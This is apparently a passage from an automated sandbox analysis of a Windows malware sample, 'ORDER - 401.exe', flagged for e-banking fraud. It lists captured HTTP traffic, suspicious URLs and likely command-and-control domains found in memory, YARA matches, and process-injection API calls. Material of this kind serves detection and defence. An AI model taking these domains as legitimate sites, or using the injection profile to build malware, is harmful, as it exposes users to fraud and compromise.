                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 Dec 2024 12:53:30 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: ORDER - 401.exe | String found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4679125210.00000000055B7000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bagatowcannabis.cloud
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4679125210.00000000055B7000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bagatowcannabis.cloud/zmax/
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.guacamask.online/px.js?ch=1
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.guacamask.online/px.js?ch=2
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.guacamask.online/sk-logabpstatus.php?a=MnJENVJwV2lhZW0rV2U4VmdEend6Tm5ucmlLSndTR0pwVHBzV3
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005D58000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004468000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.litespeedtech.com/error-page
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?4aeef933dc234878d84d1123ae8eab9f
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000005EEA000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4679752589.00000000073B0000.00000004.00000800.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000045FA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000004DA4000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000034B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2767212475.0000000038D14000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://lameo.nrkeiu.tdvgb.cn/123.html
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ieUnatt.exe, 00000008.00000002.4676389465.0000000002623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ieUnatt.exe, 00000008.00000003.2655937344.00000000076BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://moneyeasilynac.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://moneyeasilypao.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://moneyeasilysfl.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000002.4677795800.00000000050C8000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://moneyeasilysni.top/index.php?code=MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.kkpmoneysocial.top
                Source: ieUnatt.exe, 00000008.00000002.4677795800.0000000004F36000.00000004.10000000.00040000.00000000.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000003646000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK

                E-Banking Fraud

                Source: Yara match | File source: 5.2.ORDER - 401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.ORDER - 401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample | Static PE information: Filename: ORDER - 401.exe
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0042CCB3 NtClose,5_2_0042CCB3
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052B60 NtClose,LdrInitializeThunk,5_2_01052B60
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01052DF0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01052C70
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010535C0 NtCreateMutant,LdrInitializeThunk,5_2_010535C0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01054340 NtSetContextThread,5_2_01054340
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01054650 NtSuspendThread,5_2_01054650
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052B80 NtQueryInformationFile,5_2_01052B80
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052BA0 NtEnumerateValueKey,5_2_01052BA0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052BE0 NtQueryValueKey,5_2_01052BE0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052BF0 NtAllocateVirtualMemory,5_2_01052BF0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052AB0 NtWaitForSingleObject,5_2_01052AB0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052AD0 NtReadFile,5_2_01052AD0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052AF0 NtWriteFile,5_2_01052AF0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052D00 NtSetInformationFile,5_2_01052D00
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052D10 NtMapViewOfSection,5_2_01052D10
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052D30 NtUnmapViewOfSection,5_2_01052D30
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052DB0 NtEnumerateKey,5_2_01052DB0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052DD0 NtDelayExecution,5_2_01052DD0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052C00 NtQueryInformationProcess,5_2_01052C00
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052C60 NtCreateKey,5_2_01052C60
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052CA0 NtQueryInformationToken,5_2_01052CA0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052CC0 NtQueryVirtualMemory,5_2_01052CC0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052CF0 NtOpenProcess,5_2_01052CF0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052F30 NtCreateSection,5_2_01052F30
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052F60 NtCreateProcessEx,5_2_01052F60
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052F90 NtProtectVirtualMemory,5_2_01052F90
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052FA0 NtQuerySection,5_2_01052FA0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052FB0 NtResumeThread,5_2_01052FB0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052FE0 NtCreateFile,5_2_01052FE0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052E30 NtWriteVirtualMemory,5_2_01052E30
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052E80 NtReadVirtualMemory,5_2_01052E80
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052EA0 NtAdjustPrivilegesToken,5_2_01052EA0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01052EE0 NtQueueApcThread,5_2_01052EE0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01053010 NtOpenDirectoryObject,5_2_01053010
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01053090 NtSetValueKey,5_2_01053090
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010539B0 NtGetContextThread,5_2_010539B0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01053D10 NtOpenProcessToken,5_2_01053D10
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01053D70 NtOpenThread,5_2_01053D70
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04314650 NtSuspendThread,LdrInitializeThunk,8_2_04314650
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04314340 NtSetContextThread,LdrInitializeThunk,8_2_04314340
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04312C70
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312C60 NtCreateKey,LdrInitializeThunk,8_2_04312C60
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04312CA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_04312D30
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04312D10
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04312DF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312DD0 NtDelayExecution,LdrInitializeThunk,8_2_04312DD0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_04312E80
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312EE0 NtQueueApcThread,LdrInitializeThunk,8_2_04312EE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312F30 NtCreateSection,LdrInitializeThunk,8_2_04312F30
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312FB0 NtResumeThread,LdrInitializeThunk,8_2_04312FB0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312FE0 NtCreateFile,LdrInitializeThunk,8_2_04312FE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312AF0 NtWriteFile,LdrInitializeThunk,8_2_04312AF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312AD0 NtReadFile,LdrInitializeThunk,8_2_04312AD0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312B60 NtClose,LdrInitializeThunk,8_2_04312B60
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_04312BA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04312BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04312BE0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043135C0 NtCreateMutant,LdrInitializeThunk,8_2_043135C0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_043139B0 NtGetContextThread,LdrInitializeThunk,8_2_043139B0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312C00 NtQueryInformationProcess,8_2_04312C00
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312CF0 NtOpenProcess,8_2_04312CF0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312CC0 NtQueryVirtualMemory,8_2_04312CC0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312D00 NtSetInformationFile,8_2_04312D00
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312DB0 NtEnumerateKey,8_2_04312DB0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312E30 NtWriteVirtualMemory,8_2_04312E30
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312EA0 NtAdjustPrivilegesToken,8_2_04312EA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312F60 NtCreateProcessEx,8_2_04312F60
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312FA0 NtQuerySection,8_2_04312FA0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312F90 NtProtectVirtualMemory,8_2_04312F90
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312AB0 NtWaitForSingleObject,8_2_04312AB0
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04312B80 NtQueryInformationFile,8_2_04312B80
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04313010 NtOpenDirectoryObject,8_2_04313010
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04313090 NtSetValueKey,8_2_04313090
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04313D10 NtOpenProcessToken,8_2_04313D10
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_04313D70 NtOpenThread,8_2_04313D70
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001C9810 NtCreateFile,8_2_001C9810
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001C9970 NtReadFile,8_2_001C9970
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001C9A60 NtDeleteFile,8_2_001C9A60
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001C9B00 NtClose,8_2_001C9B00
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Code function: 8_2_001C9C50 NtAllocateVirtualMemory,8_2_001C9C50
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_023FDE84 0_2_023FDE84
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B67368 0_2_04B67368
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B60006 0_2_04B60006
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B60040 0_2_04B60040
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B67358 0_2_04B67358
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_074E1A28 0_2_074E1A28
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00418BF3 5_2_00418BF3
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0042F253 5_2_0042F253
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_004022E0 5_2_004022E0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0041046B 5_2_0041046B
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00410473 5_2_00410473
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_004025F0 5_2_004025F0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00416DF3 5_2_00416DF3
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00416DAC 5_2_00416DAC
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0040E673 5_2_0040E673
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00410693 5_2_00410693
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00402F25 5_2_00402F25
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00402F30 5_2_00402F30
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0040E7C3 5_2_0040E7C3
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0040E7B7 5_2_0040E7B7
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01010100 5_2_01010100
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010BA118 5_2_010BA118
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A8158 5_2_010A8158
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010E01AA 5_2_010E01AA
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010D81CC 5_2_010D81CC
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010B2000 5_2_010B2000
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010DA352 5_2_010DA352
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010E03E6 5_2_010E03E6
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0102E3F0 5_2_0102E3F0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010A02C0 5_2_010A02C0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01020535 5_2_01020535
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010E0591 5_2_010E0591
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010C4420 5_2_010C4420
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010D2446 5_2_010D2446
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010CE4F6 5_2_010CE4F6
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01044750 5_2_01044750
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01020770 5_2_01020770
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0101C7C0 5_2_0101C7C0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0103C6E0 5_2_0103C6E0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01036962 5_2_01036962
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010229A0 5_2_010229A0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010EA9A6 5_2_010EA9A6
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_01022840 5_2_01022840
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0102A840 5_2_0102A840
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010068B8 5_2_010068B8
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0104E8F0 5_2_0104E8F0
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010DAB40 5_2_010DAB40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010D6BD75_2_010D6BD7
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101EA805_2_0101EA80
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102AD005_2_0102AD00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010BCD1F5_2_010BCD1F
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01038DBF5_2_01038DBF
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0101ADE05_2_0101ADE0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01020C005_2_01020C00
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C0CB55_2_010C0CB5
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01010CF25_2_01010CF2
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01062F285_2_01062F28
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01040F305_2_01040F30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_010C2F305_2_010C2F30
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01094F405_2_01094F40
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0109EFA05_2_0109EFA0
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_01012FC85_2_01012FC8
                Source: C:\Users\user\Desktop\ORDER - 401.exeCode function: 5_2_0102CFE05_2_0102CFE0
